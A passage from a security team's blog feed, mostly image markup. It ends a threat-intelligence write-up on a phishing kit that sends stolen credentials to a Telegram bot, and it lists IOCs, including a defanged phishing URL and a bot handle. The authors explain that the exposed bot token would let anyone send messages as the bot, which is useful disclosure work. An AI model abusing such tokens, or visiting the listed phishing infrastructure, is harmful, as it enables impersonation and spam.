srcset="https://substackcdn.com/image/fetch/$s_!GER-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 424w, https://substackcdn.com/image/fetch/$s_!GER-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 848w, https://substackcdn.com/image/fetch/$s_!GER-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 1272w, https://substackcdn.com/image/fetch/$s_!GER-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GER-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png" width="467" height="532.1105769230769" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1659,&quot;width&quot;:1456,&quot;resizeWidth&quot;:467,&quot;bytes&quot;:850546,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!GER-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 424w, https://substackcdn.com/image/fetch/$s_!GER-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 848w, https://substackcdn.com/image/fetch/$s_!GER-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 1272w, https://substackcdn.com/image/fetch/$s_!GER-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e8719c-3df5-4bb4-942f-682b1fe757b6_1824x2078.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Next, all gathered information including credentials are sent via Telegram Message, once again exposing the Bot Token and the Chat ID.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Cm7H!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Cm7H!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 424w, https://substackcdn.com/image/fetch/$s_!Cm7H!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 848w, https://substackcdn.com/image/fetch/$s_!Cm7H!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 1272w, https://substackcdn.com/image/fetch/$s_!Cm7H!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Cm7H!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png" width="420" height="572.5139664804469" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:976,&quot;width&quot;:716,&quot;resizeWidth&quot;:420,&quot;bytes&quot;:336552,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Cm7H!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 424w, https://substackcdn.com/image/fetch/$s_!Cm7H!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 848w, https://substackcdn.com/image/fetch/$s_!Cm7H!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 1272w, https://substackcdn.com/image/fetch/$s_!Cm7H!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8c25660a-5022-4685-aba8-fa2ac8714c0b_716x976.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Now if we were <em>bad people</em> (and we are not) we could have just grabbed the Bot Token and start spamming content on its behalf. By modifying the <em>text</em> parameter, we can literally send anything under the Bot&#8217;s name.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7TlZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7TlZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 424w, https://substackcdn.com/image/fetch/$s_!7TlZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 848w, https://substackcdn.com/image/fetch/$s_!7TlZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 1272w, https://substackcdn.com/image/fetch/$s_!7TlZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7TlZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png" width="410" height="609.8607242339833" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ac7b846c-4260-4280-9aba-6f562e869564_718x1068.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1068,&quot;width&quot;:718,&quot;resizeWidth&quot;:410,&quot;bytes&quot;:322914,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7TlZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 424w, https://substackcdn.com/image/fetch/$s_!7TlZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 848w, https://substackcdn.com/image/fetch/$s_!7TlZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 1272w, https://substackcdn.com/image/fetch/$s_!7TlZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fac7b846c-4260-4280-9aba-6f562e869564_718x1068.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Now, if we were <em>really bad people</em> (again, we are not), we could just change the <em>chat_id</em> parameter also, and start spamming <strong>anyone</strong> with <strong>any content</strong> under the Bot&#8217;s name. </p><p>Let&#8217;s try to find out this Bot&#8217;s handler and who is it relying information to. We can do so with Telegram&#8217;s API.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2OxP!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2OxP!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 424w, https://substackcdn.com/image/fetch/$s_!2OxP!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 848w, https://substackcdn.com/image/fetch/$s_!2OxP!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 1272w, https://substackcdn.com/image/fetch/$s_!2OxP!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2OxP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png" width="1456" height="956" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:956,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:904878,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2OxP!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 424w, https://substackcdn.com/image/fetch/$s_!2OxP!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 848w, https://substackcdn.com/image/fetch/$s_!2OxP!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 1272w, https://substackcdn.com/image/fetch/$s_!2OxP!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fab4922cf-9448-47b3-b0d8-2ab87924e04f_2430x1596.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>And there it is&#8212;our Muppet and the puppeteer behind it.</strong></p><p>Now comes our favourite part: the flamethrower. Let&#8217;s burn down their accounts, starting with reports to their providers, followed by our Brand Protection solutions to speed up the process and keep the issue under control.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3bTF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3bTF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 424w, https://substackcdn.com/image/fetch/$s_!3bTF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 848w, https://substackcdn.com/image/fetch/$s_!3bTF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 1272w, https://substackcdn.com/image/fetch/$s_!3bTF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3bTF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png" width="318" height="445.2" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1204,&quot;width&quot;:860,&quot;resizeWidth&quot;:318,&quot;bytes&quot;:295307,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!3bTF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 424w, https://substackcdn.com/image/fetch/$s_!3bTF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 848w, https://substackcdn.com/image/fetch/$s_!3bTF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 1272w, https://substackcdn.com/image/fetch/$s_!3bTF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F23b676f7-ff07-481b-b56d-eb541eff35cc_860x1204.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Another day, another burnt phishing infra. <strong>Now we can freely enjoy the rest of our Friday.</strong></p><p>Thanks for reading, and don&#8217;t go on a fishing trip without your muppet repellent.</p><div><hr></div><h2>IOCs</h2><pre><code>URL:https://firebasestorage.googleapis[.]com/v0/b/aloneatprom-
7fde1.appspot.com/o/gb%2Funiversal.html?alt=media&amp;token=93f4ac80-4eae-4cd1-8b68-294631c8c821#ayuda@bitso.com)
TelegramBot:@Slimkudibot</code></pre>]]></content:encoded></item><item><title><![CDATA[Stealing Christmas]]></title><description><![CDATA[And this time it's not the Grinch]]></description><link>https://quetzal.bitso.com/p/stealing-christmas</link><guid isPermaLink="false">https://quetzal.bitso.com/p/stealing-christmas</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Wed, 08 Jan 2025 16:03:01 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!j1eI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!j1eI!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!j1eI!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!j1eI!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!j1eI!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!j1eI!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!j1eI!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic" width="481" height="481" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/01adfda3-e097-4408-a41b-e47c69950d05_1024x1024.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:481,&quot;bytes&quot;:281807,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 